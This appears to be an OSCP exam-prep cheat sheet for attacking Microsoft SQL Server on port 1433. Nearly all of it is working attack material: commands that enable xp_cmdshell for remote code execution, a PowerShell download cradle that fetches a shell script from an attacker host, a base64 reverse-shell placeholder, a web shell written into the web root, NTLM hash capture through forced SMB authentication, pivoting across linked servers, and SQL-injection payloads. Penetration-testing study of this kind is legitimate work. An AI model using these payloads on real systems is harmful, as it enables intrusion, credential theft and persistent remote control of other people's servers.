// notes/ Service Enumeration
🗄️

MSSQL Attacks (1433)

xp_cmdshell, impersonation, linked servers, and OS command execution via MSSQL.

#mssql#port 1433#database
source · airouboss/oscp-prep-notes-2026 · concepts/mssql-attacks.md

MSSQL Attacks

Connecting

bash
$# With Windows auth:
$impacket-mssqlclient 'DOMAIN/USER:PASS'@TARGET -windows-auth
$# With SQL auth:
$impacket-mssqlclient 'sa:password'@TARGET
$# NetExec check:
$nxc mssql TARGET -u USER -p PASS
$nxc mssql TARGET -u USER -p PASS -d DOMAIN

Enumeration

sql
01-- Current user and role:
02SELECT SYSTEM_USER;
03SELECT IS_SRVROLEMEMBER('sysadmin');
04
05-- List databases:
06SELECT name FROM master.sys.databases;
07-- Or in impacket: enum_db
08
09-- List users:
10SELECT name FROM master.sys.server_principals;
11
12-- Check impersonation:
13SELECT * FROM sys.server_permissions WHERE type = 'IM';
14-- Or in impacket: enum_impersonate
15
16-- List linked servers:
17EXEC sp_linkedservers;
18SELECT * FROM sys.servers;

Impersonation

sql
01-- If enum_impersonate shows a login you can impersonate:
02EXECUTE AS LOGIN = 'sa';
03-- Verify:
04SELECT SYSTEM_USER;
05-- Now you're sa → enable xp_cmdshell

xp_cmdshell → RCE

sql
01-- Enable (requires sysadmin):
02EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
03EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
04-- Or in impacket: enable_xp_cmdshell
05
06-- Execute commands:
07EXEC xp_cmdshell 'whoami';
08EXEC xp_cmdshell 'powershell -e BASE64_REVSHELL';
09
10-- Reverse shell one-liner:
11EXEC xp_cmdshell 'powershell -c "iex(new-object net.webclient).downloadstring(''http://ATTACKER/shell.ps1'')"';

Linked Servers

sql
01-- Enumerate linked servers:
02EXEC sp_linkedservers;
03
04-- Execute on linked server:
05EXEC ('SELECT SYSTEM_USER') AT [LINKED-SERVER];
06EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [LINKED-SERVER];
07EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [LINKED-SERVER];
08EXEC ('EXEC xp_cmdshell ''whoami'';') AT [LINKED-SERVER];
09
10-- Double-hop through linked servers:
11EXEC ('EXEC (''SELECT SYSTEM_USER'') AT [SECOND-LINK]') AT [FIRST-LINK];

File Read/Write

sql
01-- Read file:
02SELECT * FROM OPENROWSET(BULK 'C:\inetpub\wwwroot\web.config', SINGLE_CLOB) AS r;
03
04-- Write file (OLE Automation):
05EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
06DECLARE @OLE INT;
07EXEC sp_OACreate 'Scripting.FileSystemObject', @OLE OUT;
08DECLARE @FileID INT;
09EXEC sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'C:\inetpub\wwwroot\shell.aspx', 8, 1;
10EXEC sp_OAMethod @FileID, 'WriteLine', NULL, '<%@ Page Language="C#" %><%Response.Write(System.Diagnostics.Process.Start("cmd","/c "+Request["c"]).StandardOutput.ReadToEnd());%>';
11EXEC sp_OADestroy @FileID;
12EXEC sp_OADestroy @OLE;

NTLM Hash Capture

sql
01-- Force MSSQL to auth to your SMB server:
02EXEC xp_dirtree '\\ATTACKER-IP\share', 1, 1;
03-- Or:
04EXEC master..xp_subdirs '\\ATTACKER-IP\share';
05
06-- On attacker, catch with responder or smbserver:
07sudo responder -I eth0
08-- Or:
09impacket-smbserver share . -smb2support

SQLi → MSSQL RCE

code
01# Stacked queries through SQL injection:
02'; EXEC sp_configure 'show advanced options',1; RECONFIGURE;-- -
03'; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- -
04'; EXEC xp_cmdshell 'whoami';-- -

Key Notes

  • Default port: 1433 (TCP), 1434 (UDP for browser service)
  • sa is the built-in sysadmin account
  • Windows auth uses the AD/machine credentials
  • Impersonation is a common OSCP vector — always check enum_impersonate
  • Linked servers can chain access across multiple SQL instances